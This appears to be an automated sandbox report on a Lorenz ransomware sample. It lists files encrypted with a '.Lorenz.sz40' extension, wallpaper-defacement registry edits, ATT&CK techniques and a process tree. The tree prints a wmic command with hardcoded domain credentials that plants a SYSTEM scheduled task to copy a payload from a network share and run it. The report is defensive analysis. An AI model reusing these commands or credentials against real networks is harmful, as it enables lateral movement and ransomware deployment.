HagAooooAKKKKYgpaSloAKKKKACiiigBaB6npQBQT6dKADqaDR2oFABRRR2oAKKKKACiiigBaKKBQAv8AD9aSlPWkoAKKKKAFpKXtSUAKKKKKBBRRRQAq9aSlHQmkoAKKKKAFooooA1fDk3l35iPSVcfiP8mqN/D9nvZouyscfTtTLaUwXEco6owNaviSIGWG6TlZV6/59qXUZjUUUUxBRRRQAtFFFABRRRQBr+Gv+P8Af/cNZlz/AMfMv++f51f8PTLFqIDnG9SoPvUeo6dcw3kgETurMSpUZ4NLqPoXdO/5F+8/H+VYdb6RNYeH5hP8ry9F781gUIGFLRRTEFFFFABRRRQAUUU6NDJIqLyWOBTEbVp/onh+aY8NMcD+X+NYlbWvuIYLayQ8IoJ/kP61i0kNhUu6FnXchVQuDtPJPrUVFAh6+X5bbg2/jaR0rV0zVEsrUh7c7SeGXufesenybQ21HLIOh6UDCaTzZnkxjcxOPSmUUUxBS0lLQAlLSUtABRRRQAUUUUAFL2pKWgAo7UGjtQAUUUUAFLSUtABRRRQIKKKKACiiigBR1pKUUlACig80dKKACg0UuCRntQAlFLwPejPoAKAAAnsaXB9vzpMk9TRQAuPcUY9xSUUALtPt+dGD6UlFABRS7j35+tHB9qACkpcYGaKAAetHUZooFACUpoPFB7UAJS0lLQAV2Nr/AMesP+4v8q4

Signatures

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\SaveOpen.crw.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\WatchGrant.tiff.Lorenz.sz40	audiodg.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\T:	audiodg.exe
File opened (read-only)	\??\A:	audiodg.exe
File opened (read-only)	\??\L:	audiodg.exe
File opened (read-only)	\??\M:	audiodg.exe
File opened (read-only)	\??\N:	audiodg.exe
File opened (read-only)	\??\P:	audiodg.exe
File opened (read-only)	\??\G:	audiodg.exe
File opened (read-only)	\??\H:	audiodg.exe
File opened (read-only)	\??\K:	audiodg.exe
File opened (read-only)	\??\R:	audiodg.exe
File opened (read-only)	\??\U:	audiodg.exe
File opened (read-only)	\??\Z:	audiodg.exe
File opened (read-only)	\??\F:	audiodg.exe
File opened (read-only)	\??\I:	audiodg.exe
File opened (read-only)	\??\O:	audiodg.exe
File opened (read-only)	\??\W:	audiodg.exe
File opened (read-only)	\??\Y:	audiodg.exe
File opened (read-only)	\??\V:	audiodg.exe
File opened (read-only)	\??\X:	audiodg.exe
File opened (read-only)	\??\B:	audiodg.exe
File opened (read-only)	\??\E:	audiodg.exe
File opened (read-only)	\??\J:	audiodg.exe
File opened (read-only)	\??\Q:	audiodg.exe
File opened (read-only)	\??\S:	audiodg.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ul-oob.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-pl.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_delete_18.svg.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\AppStore_icon.svg.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jre1.8.0_66\release.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_w1\WA104381125.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2Fluent.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GOTHICBI.TTF.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_es.properties.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\de.pak.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-ul-phn.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-180.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-oob.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN121.XML.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\It.Tests.ps1.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\bun.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial3-ul-oob.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Grace-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\7-Zip\Lang\zh-tw.txt.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail2x.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Schoolbook.xml.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription2-pl.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nextarrow_default.svg.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\7-Zip\Lang\sv.txt.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL104.XML.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\main-selector.css.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\ShowResume.bmp.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-pl.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe.manifest.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL116.XML.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x_2x.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSUIGHUB.TTF.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PAPYRUS.ELM.Lorenz.sz40	audiodg.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\8K3e5x6k1v12.bmp	audiodg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp"	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp"	reg.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp"	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe
2020	audiodg.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1788	WMIC.exe
Token: SeSecurityPrivilege	1788	WMIC.exe
Token: SeTakeOwnershipPrivilege	1788	WMIC.exe
Token: SeLoadDriverPrivilege	1788	WMIC.exe
Token: SeSystemProfilePrivilege	1788	WMIC.exe
Token: SeSystemtimePrivilege	1788	WMIC.exe
Token: SeProfSingleProcessPrivilege	1788	WMIC.exe
Token: SeIncBasePriorityPrivilege	1788	WMIC.exe
Token: SeCreatePagefilePrivilege	1788	WMIC.exe
Token: SeBackupPrivilege	1788	WMIC.exe
Token: SeRestorePrivilege	1788	WMIC.exe
Token: SeShutdownPrivilege	1788	WMIC.exe
Token: SeDebugPrivilege	1788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1788	WMIC.exe
Token: SeRemoteShutdownPrivilege	1788	WMIC.exe
Token: SeUndockPrivilege	1788	WMIC.exe
Token: SeManageVolumePrivilege	1788	WMIC.exe
Token: 33	1788	WMIC.exe
Token: 34	1788	WMIC.exe
Token: 35	1788	WMIC.exe
Token: 36	1788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1788	WMIC.exe
Token: SeSecurityPrivilege	1788	WMIC.exe
Token: SeTakeOwnershipPrivilege	1788	WMIC.exe
Token: SeLoadDriverPrivilege	1788	WMIC.exe
Token: SeSystemProfilePrivilege	1788	WMIC.exe
Token: SeSystemtimePrivilege	1788	WMIC.exe
Token: SeProfSingleProcessPrivilege	1788	WMIC.exe
Token: SeIncBasePriorityPrivilege	1788	WMIC.exe
Token: SeCreatePagefilePrivilege	1788	WMIC.exe
Token: SeBackupPrivilege	1788	WMIC.exe
Token: SeRestorePrivilege	1788	WMIC.exe
Token: SeShutdownPrivilege	1788	WMIC.exe
Token: SeDebugPrivilege	1788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1788	WMIC.exe
Token: SeRemoteShutdownPrivilege	1788	WMIC.exe
Token: SeUndockPrivilege	1788	WMIC.exe
Token: SeManageVolumePrivilege	1788	WMIC.exe
Token: 33	1788	WMIC.exe
Token: 34	1788	WMIC.exe
Token: 35	1788	WMIC.exe
Token: 36	1788	WMIC.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2020 wrote to memory of 4064	2020	audiodg.exe	70
PID 2020 wrote to memory of 4064	2020	audiodg.exe	70
PID 2020 wrote to memory of 4064	2020	audiodg.exe	70
PID 4064 wrote to memory of 4080	4064	cmd.exe	71
PID 4064 wrote to memory of 4080	4064	cmd.exe	71
PID 4064 wrote to memory of 4080	4064	cmd.exe	71
PID 2020 wrote to memory of 1724	2020	audiodg.exe	72
PID 2020 wrote to memory of 1724	2020	audiodg.exe	72
PID 2020 wrote to memory of 1724	2020	audiodg.exe	72
PID 1724 wrote to memory of 4176	1724	cmd.exe	73
PID 1724 wrote to memory of 4176	1724	cmd.exe	73
PID 1724 wrote to memory of 4176	1724	cmd.exe	73
PID 2020 wrote to memory of 4168	2020	audiodg.exe	74
PID 2020 wrote to memory of 4168	2020	audiodg.exe	74
PID 2020 wrote to memory of 4168	2020	audiodg.exe	74
PID 4168 wrote to memory of 4184	4168	cmd.exe	75
PID 4168 wrote to memory of 4184	4168	cmd.exe	75
PID 4168 wrote to memory of 4184	4168	cmd.exe	75
PID 2020 wrote to memory of 1588	2020	audiodg.exe	76
PID 2020 wrote to memory of 1588	2020	audiodg.exe	76
PID 2020 wrote to memory of 1588	2020	audiodg.exe	76
PID 1588 wrote to memory of 4336	1588	cmd.exe	77
PID 1588 wrote to memory of 4336	1588	cmd.exe	77
PID 1588 wrote to memory of 4336	1588	cmd.exe	77
PID 2020 wrote to memory of 4420	2020	audiodg.exe	78
PID 2020 wrote to memory of 4420	2020	audiodg.exe	78
PID 2020 wrote to memory of 4420	2020	audiodg.exe	78
PID 4420 wrote to memory of 4400	4420	cmd.exe	79
PID 4420 wrote to memory of 4400	4420	cmd.exe	79
PID 4420 wrote to memory of 4400	4420	cmd.exe	79
PID 2020 wrote to memory of 4316	2020	audiodg.exe	80
PID 2020 wrote to memory of 4316	2020	audiodg.exe	80
PID 2020 wrote to memory of 4316	2020	audiodg.exe	80
PID 4316 wrote to memory of 4288	4316	cmd.exe	81
PID 4316 wrote to memory of 4288	4316	cmd.exe	81
PID 4316 wrote to memory of 4288	4316	cmd.exe	81
PID 2020 wrote to memory of 3964	2020	audiodg.exe	82
PID 2020 wrote to memory of 3964	2020	audiodg.exe	82
PID 2020 wrote to memory of 3964	2020	audiodg.exe	82
PID 3964 wrote to memory of 1788	3964	cmd.exe	84
PID 3964 wrote to memory of 1788	3964	cmd.exe	84
PID 3964 wrote to memory of 1788	3964	cmd.exe	84

C:\Users\Admin\AppData\Local\Temp\audiodg.exe
"C:\Users\Admin\AppData\Local\Temp\audiodg.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4064
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4168
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1588
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    3⤵
    - Sets desktop wallpaper using registry
    PID:4336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    3⤵
    - Modifies registry class
    PID:4400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4316
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    3⤵
    - Modifies data under HKEY_USERS
    PID:4288
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe %windir%lsamp.exe & start %windir%lsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3964
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe C:\Windowslsamp.exe & start C:\Windowslsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1788

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads